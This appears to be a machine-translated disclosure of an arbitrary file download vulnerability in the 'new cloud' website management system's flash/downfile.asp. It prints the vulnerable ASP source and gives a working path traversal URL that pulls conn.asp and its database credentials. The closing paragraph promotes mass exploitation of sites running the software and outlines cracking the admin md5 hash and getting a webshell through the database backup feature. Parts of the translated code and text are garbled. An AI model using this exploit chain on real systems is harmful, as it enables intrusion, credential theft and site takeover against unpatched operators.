Arbitrary File Download Vulnerability in the new cloud website management system

The problem occurs on flash/downfile. asp. Let's take a look at the code first.

<%
Dim url, strUrl, strPath
Url = Replace (Request ("url"), "'", ""), "% ",""),"\","/")
// Replace some characters first, replace 'with null, % with null, and \/

If Len (url)> 3 Then
If Left (url, 1) = "/" Then
Response. Redirect url // if the first character of the url submitted by the user is/, direct to url
End If
If Left (url, 3) = "../" Then
Response. Redirect url // same as above, which means you are not allowed to use ../to jump to the directory.
End If
StrUrl = Left (url, 10)
If InStr (strUrl, ": //")> 0 Then // This, Khan ·~~ : // Do not know what to do
Response. Redirect url
End If
If InStr (url, "/")> 0 Then
StrPath = Server. MapPath (".") & "\" & url // Add the physical address
StrPath = Replace (strPath, "/", "\") // Replace/ \
Call downThisFile (strPath) // HOHO ~~ Download started
Else
Response. Redirect url
End If
End If

Sub downThisFile (thePath)
Response. Clear
On Error Resume Next
Dim stream, fileName, fileContentType

FileName = split (thePath, "\") (UBound (split (thePath ,"\")))
Set stream = Server. CreateObject ("adodb. stream ")
Stream. Open
Stream. Type = 1
Stream. LoadFromFile (thePath)
Response. AddHeader "Content-Disposition", "attachment; filename =" & fileName
Response. AddHeader "Content-Length", stream. Size
Response. Charset = "UTF-8"
Response. ContentType = "application/octet-stream"
Response. BinaryWrite stream. Read
Response. Flush
Stream. Close
Set stream = Nothing
End Sub
%>
It seems that the URLs are all processed and cannot be used./to jump to the directory. However, it is strange for him to judge the first three characters of a url. So, hey! The first three characters cannot be ../. Can't I be followed? The url parameter "uploadfile/.../conn. asp" is constructed. The overall address is http: // 127.0.0.1/flash/downfile. asp? Url = uploadfile/.../../conn. asp. Hey ~~ Download the conn. asp file.
There are still a lot of people using this whole site program. I even saw two hacker websites using it. However, this vulnerability exists. It can be said that this vulnerability is used to kill all the systems on the Internet that use the new cloud, and does not even make up 10.18 of SP1. However, many major websites use the SQL version, and the host shields port 1433. Therefore, the use of the server becomes a problem. For access systems, as long as the backend is not renamed, And the md5 password can be queried through www.20.5.com, the backend has the database backup function, it is not a problem to obtain webshell.